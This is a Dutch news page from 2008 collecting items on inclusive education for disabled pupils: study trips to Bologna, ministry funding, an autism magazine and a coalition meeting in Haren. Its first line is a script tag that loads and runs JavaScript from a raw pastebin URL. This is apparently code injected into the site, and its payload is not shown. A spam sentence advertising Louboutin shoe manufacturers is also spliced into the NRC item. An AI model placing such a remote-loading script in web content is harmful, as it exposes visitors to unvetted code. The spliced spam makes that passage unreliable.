<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws - 2008


zorgstelsel heeft gehandicapte klanten in wurggreep 24 oktober 2008
http://extra.volkskrant.nl/opinie/artikel/show/id/1737/Zorgstelsel_heeft_klanten_in_wurggreep
Als gehandicapte in een zorginstelling heb je nauwelijks middelen om je tegen slechte dienstverlening te verweren. Hoe meer beperkingen je hebt hoe moeilijker het is. Alle reden om uit deze instellingen te blijven en je voor te bereiden op een leven in de gewone maatschappij zodat je zelf de keuzes maakt over de zorg die je wilt. En leidt ook die samenleving op. Ga dus naar de reguliere school.

goed voorbeeld inclusief onderwijs Gorinchem 23 oktober 2008
Elke leerling is welkom op Mariëngaarde. Tenzij blijkt dat een leerling niet gelukkig is, geďsoleerd raakt of geen ontwikkeling meer doormaakt. Maar in de praktijk komt dat eigenlijk niet voor. Er wordt uitgegaan van kansen die leerlingen hebben en niet van hun beperkingen. Zorgleerlingen vinden ze niet het juiste woord.
verder lezen op http://www.cg-raad.nl/onderwijs/20080508.html

natuurlijk welkom op school 23 oktober 2008
Dit is een mooi project van de CG raad met een mooie nieuwsbrief. zie
http://www.cg-raad.nl/nwos/index.html

Onderwijsreizen naar Bologna Rimini 13 september 2008
Italie kent al meer dan 30 jaar het inclusieve onderwijs. Tijdens de industralisatie in de 60er jaren merkte het onderwijsveld dat vooral kinderen uit niet dominante culturen (arme, dialectsprekende Italianen uit het zuiden die in het noorden kwamen werken) niet naar regulier onderwijs konden. Dit vonden zij ongewenst voor de ontwikkeling van die kinderen en dus de maatschappij. Waarop selecteer je dan wel voor het speciaal onderwijs? Hier wist niemand een antwoord op en dus nam het onderwijsveld het besluit, dat iedereen naar het reguliere moest en de speciale scholen werden afgeschaft. Werkenderwijs ontwierpen ze wetten om het onderwijs voor leerlingen en leraren te verbeteren. Dit proces van 30 jaar is in de regio Emilio Romagna uitgemond in prachtige didactische hoogstandjes op doorsnee scholen. U kunt dit gaan bekijken in studiereizen naar Bologna en Rimini, waarbij er vooral aandacht zal zijn voor inclusief onderwijs aan leerlingen met autisme ed, cognitieve beperkingen, mcg en moeilijk gedrag. Info grooff1@xs4all.nl Tolk aanwezig.

200000 euro beschikbaar per school van 1000 leerlingen 13 september 2008
Het ministerie van onderwijs stelt 200000 euro per 1000 leerlingen beschikbaar voor scholen voor de verbetering van het onderwijs. Dit bedrag is bestemd voor de volgende 3 jaar. Een school van 2000 leerlingen krijgt dus het dubbele. Dit is een uitgelezen kans voor scholen om aan kwaliteitsverbetering te doen rond onderwijs aan leerlingen die slechter presteren dan hun talenten doen verwachten . Blijkbaar hebben deze leerlingen een andere aanpak nodig. Deze leerlingen worden nu vaak verwezen naar speciale scholen , of verdwijnen naar lagere niveaus en vervolgens van school. Dit is ongewenst voor de leerlingen en voor de maatschappij aangezien zo veel talent wordt weggegooid. Met dit geld kunnen we deze processen terugdraaien. Ouders, ga in de ouderraad zitten en laat je stem horen.

NRC 6 september Inclusief Onderwijs 13 september 2008
Brigit Kooijman laat in de laatste alineas een schooldirecteur aan het woord die prachtig zijn inclusieve school beschrijft. Selecteer betrouwbare louboutin schoenen heren fabrikant hier. We zullen alle beste schoenen fabrieken voor u opsommen. Zijn visie luidt, Hoe diverser mijn school is, des te rijker zij is. Het artikel is na te lezen op www.brigitkooijman.nl publicaties. liever geen gebrek.

2e magazine met thema autisme is uit. 13 juni 2008
Het 2e magazine van Stichting Inclusief Onderwijs is uit met als thema " goed onderwijs aan leerlingen met autisme in de inclusieve klas.3 hoofdstukken uit het boek van de befaamde speciaal inclusieve leerkracht Paula Kluth, you are going to love this child, zijn samengevat.
Gratis af te halen in Amsterdam of tegen verzendkosten te bestellen via grooff1@hotmail.com .ook magazine no1 is nog verkrijgbaar.

Inclusief onderwijs voor passend onderwijs 02 juni 2008
Passend onderwijs is de nieuw gekozen term in onderwijsveld die elk kind het onderwijs wil geven die bij het kind past. Een nieuwe term dus voor inclusief onderwijs, ware het niet dat er addertjes onder het gras zitten. namelijk dat de mogelijkheid voor scholen gaat bestaan om speciale leerlingen naar de speciale school te sturen zodat ze zelf hun school niet zo hoeven in te richten dat ze deze leerling toch onderwijs kunnen bieden.Ook wordt er niet gesproken over de leerplichtige kinderen die tot nu toe geen enkel onderwijs genieten maar hun dagen uitzitten op kinderdagcentra. Ook wordt het aan de speciale scholen overgelaten hun onderwijs te verbeteren, maar is dat wel mogelijk? Misschien is de weg van speciaal onderwijs wel een doodlopende weg en moet Nederland andere wegen inslaan. U raadt het al: De weg van Inclusief Onderwijs biedt meer perspectief op een vaardige jongeman of vrouw aan het eind van de schoolloopbaan. En zullen we de dagcentra dan maar meteen sluiten? want die leiden de kinderen alleen maar op tot een blijvend bestaan als objecten in de zorg.

17 juni welkom onderwijs bijeenkomst in Haren, Noord Nederland 02 juni 2008
17 juni organiseert de coalitie voor inclusie een bijeenkomst in Noord nederland met het Thema: Iedereen is welkom in het reguliere onderwijs.
Je kan je nog aanmelden. Zie www.coalitievoorinclusie.nlDe Coalitie voor Inclusie is een beweging van mensen en organisaties die het maatschappelijke draagvlak voor een inclusieve samenleving vergroot, beleid gericht op inclusie bevordert en uitsluiting van mensen tegengaat. Uitgangspunten zijn: welkom zijn, versterken van eigen kracht van mensen, samen optrekken, interactief en pro-actief werken vanuit solidariteit en optimisme en oplossingsgericht zijn.
--------------------------------------------------------------------------------
Programma
Netwerkbijeenkomst
Onderwijs Noord Nederland
17 juni 2008
Aanmelden
PDF
--------------------------------------------------------------------------------

UITNODIGING NETWERKBIJEENKOMST

Voor iedereen die actief wil bijdragen om ‘WELKOM ONDERWIJS’ te realiseren.
Mensen en organisaties met een persoonlijke ambitie hiervoor zijn van harte uitgenodigd!!!!
U kunt iemand uit uw netwerk meenemen die ook interesse heeft.
Plaats: Zernike College, Rummerinkhof 8, 9751 SL Haren (Gr).
zie www.coalitievoorinclusie.nlinclusion through innovation 19 mei 2008
het Ministerie van onderwijs van nieuw Zeeland organiseert van 17-20 augustus een congres over;"Inclusion and Integration through Innovation". In Auckland. Opgave via www.oecd.org/edu/facilities/specialneeds
Klik hier voor meer informatie

nieuwe brochures Inclusief Onderwijs 15 januari 2008
een nieuwe uitgebreide brochure over inclusief onderwijs met veel tekst en uitleg over voorwaarden en methodes is bij ons gratis af te halen dan wel te bestellen tegen verzendkosten.